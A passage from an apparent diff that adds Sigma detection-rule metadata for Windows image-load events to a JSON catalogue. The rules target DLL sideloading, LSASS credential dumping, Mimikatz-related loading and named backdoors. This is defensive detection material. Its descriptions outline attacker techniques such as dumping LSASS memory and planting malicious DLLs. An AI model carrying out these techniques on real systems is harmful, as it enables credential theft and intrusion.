"37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "value": "Image Load of VSS Dll by Uncommon Executable" + }, + { + "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", + "meta": { + "author": "frack113", + "creation_date": "2022/12/14", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_jsschhlp.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp", + "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "68654bf0-4412-43d5-bfe8-5eaa393cd939", + "value": "Potential DLL Sideloading Via JsSchHlp" + }, + { + "description": "Detects SILENTTRINITY stager use", + "meta": { + "author": "Aleksey Potapov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_silenttrinity_stage_use.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "value": "SILENTTRINITY Stager Execution - DLL" + }, + { + "description": "A General detection for processes loading System.Drawing.ni.dll. This could be an indicator of potential Screen Capture.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_system_drawing_load.yml", + "level": "low", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", + "value": "Suspicious System.Drawing Load" + }, + { + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + ], + "filename": "image_load_side_load_from_non_system_location.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", + "https://hijacklibs.net/", + "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "value": "System DLL Sideloading From Non System Locations" + }, + { + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unikely" + ], + "filename": "image_load_susp_cmstp.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ] + }, + "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", + "value": "Cmstp Suspicious DLL Load" + }, + { + "description": "Detects Kerberos DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_kerberos_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_kerberos_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "value": "Active Directory Kerberos DLL Loaded Via Office Applications" + }, + { + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "meta": { + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "creation_date": "2019/10/27", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_dbghelp_dbgcore_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", + "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1", + "value": "Load of dbghelp/dbgcore DLL from Suspicious Process" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + ], + "filename": "image_load_side_load_antivirus.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", + "value": "Antivirus Software DLL Sideloading" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_third_party.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "value": "Third Party Software DLL Sideloading" + }, + { + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_dcom_iertutil_dll_hijack.yml", + "level": "critical", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ] + }, + "uuid": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "value": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load" + }, + { + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "meta": { + "author": "Patrick St. John, OTR (Open Threat Research)", + "creation_date": "2020/05/03", + "falsepositive": [ + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" + ], + "filename": "image_load_susp_python_image_load.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", + "https://www.py2exe.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.002" + ] + }, + "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "value": "Python Py2Exe Image Load" + }, + { + "description": "Detects CLR DLL being loaded by an scripting applications", + "meta": { + "author": "omkar72, oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/tyranid/DotNetToJScript", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://thewover.github.io/Introducing-Donut/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", + "value": "CLR DLL Loaded Via Scripting Applications" + }, + { + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "meta": { + "author": "NVISO", + "creation_date": "2020/05/04", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_susp_fax_dll.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://windows-internals.com/faxing-your-way-to-system/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_fax_dll.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "value": "Fax Service DLL Search Order Hijack" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_alternate_powershell_hosts_moduleload.yml", + "level": "low", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190610201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_alternate_powershell_hosts_moduleload.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "fe6e002f-f244-4278-9263-20e4b593827f", + "value": "Alternate PowerShell Hosts - Image" + }, + { + "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", + "meta": { + "author": "frack113", + "creation_date": "2022/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_classicexplorer32.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/", + "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "caa02837-f659-466f-bca6-48bde2826ab4", + "value": "Potential DLL Sideloading Via ClassicExplorer32.dll" + }, + { + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_foggyweb_nobelium.yml", + "level": "critical", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_foggyweb_nobelium.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587" + ] + }, + "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", + "value": "FoggyWeb Backdoor DLL Loading" + }, + { + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "filename": "image_load_side_load_dbghelp_dll.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "value": "DLL Sideloading Of DBGHELP.DLL" + }, + { + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_scm.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_scm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "bc3cc333-48b9-467a-9d1f-d44ee594ef48", + "value": "SCM DLL Sideload" + }, + { + "description": "Detects non wmiprvse loading WMI modules", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_wmi_module_load.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_module_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e", + "value": "WMI Modules Loaded" + }, + { + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_rundll32_loading_renamed_comsvcs.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1555200155351228419", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" + ] + }, + "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", + "value": "Rundll32 Loading Renamed Comsvcs DLL" + }, + { + "description": "Detects both of CVE-2022-30190 / Follina and DogWalk vulnerability exploiting msdt.exe binary to load sdiageng.dll binary", + "meta": { + "author": "Greg (rule)", + "creation_date": "2022/06/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_msdt_sdiageng.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_msdt_sdiageng.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" + ] + }, + "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "value": "MSDT.exe Loading Diagnostic Library" + }, + { + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_vmware_xfer_load_dll_from_nondefault_path.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "value": "VMware Xfer Loading DLL from Nondefault Path" + }, + { + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Valid user connecting using RDP" + ], + "filename": "image_load_unsigned_image_loaded_into_lsass.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_unsigned_image_loaded_into_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "value": "Unsigned Image Loaded Into LSASS Process" + }, + { + "description": "Detects DLL's Loaded Via Word Containing VBA Macros", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_winword_vbadll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_winword_vbadll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "value": "VBA DLL Loaded Via Microsoft Word" + }, + { + "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_dll_load_system_process.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "value": "DLL Load By System Process From Suspicious Locations" + }, + { + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/01/07", + "falsepositive": [ + "Very likely, needs more tuning" + ], + "filename": "image_load_susp_uncommon_image_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_uncommon_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "value": "Possible Process Hollowing Image Loading" + }, + { + "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/07", + "falsepositive": [ + "Rarely observed" + ], + "filename": "image_load_usp_svchost_clfsw32.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "value": "APT PRIVATELOG Image Load Pattern" + }, + { + "description": "Detects signs of the WMI script host process %SystemRoot%\\system32\\wbem\\scrcons.exe functionality being used via images being loaded by a process.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/09/02", + "falsepositive": [ + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + ], + "filename": "image_load_scrcons_imageload_wmi_scripteventconsumer.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://twitter.com/HunterPlaybook/status/1301207718355759107", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", + "value": "WMI Script Host Process Image Loaded" + }, + { + "description": "Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. Detects meterpreter's \"load powershell\" extension.", + "meta": { + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "creation_date": "2019/11/14", + "falsepositive": [ + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" + ], + "filename": "image_load_in_memory_powershell.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/p3nt4/PowerShdll", + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_in_memory_powershell.yml" + ], + "tags": [ + "attack.t1059.001", + "attack.execution" + ] + }, + "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "value": "In-memory PowerShell" + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "value": "Wmiprvse Wbemcomn DLL Hijack" + }, + { + "description": "IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "meta": { + "author": "SBousseaden", + "creation_date": "2019/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_svchost_dll_search_order_hijack.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_svchost_dll_search_order_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ] + }, + "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "value": "Svchost DLL Search Order Hijack" + }, + { + "description": "Detects the load of advapi31.dll by a process running in an uncommon folder", + "meta": { + "author": "frack113", + "creation_date": "2022/02/03", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_advapi32_dll.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hlldz/Phant0m", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_advapi32_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "d813d662-785b-42ca-8b4a-f7457d78d5a9", + "value": "Suspicious Load of Advapi31.dll" + }, + { + "description": "Detect DLL Load from Spooler Service backup folder", + "meta": { + "author": "FPT.EagleEye, Thomas Patzke (improvements)", + "creation_date": "2021/06/29", + "falsepositive": [ + "Loading of legitimate driver" + ], + "filename": "image_load_spoolsv_dll_load.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/ly4k/SpoolFool", + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", + "value": "Windows Spooler Service Suspicious Binary Load" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_side_load_office_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "value": "Microsoft Office DLL Sideload" + }, + { + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Other legitimate processes loading those DLLs in your environment." + ], + "filename": "image_load_uipromptforcreds_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", + "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" + ], + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ] + }, + "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "value": "UIPromptForCredentials DLLs" + }, + { + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate usage by software developers/testers" + ], + "filename": "image_load_tttracer_mod_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + 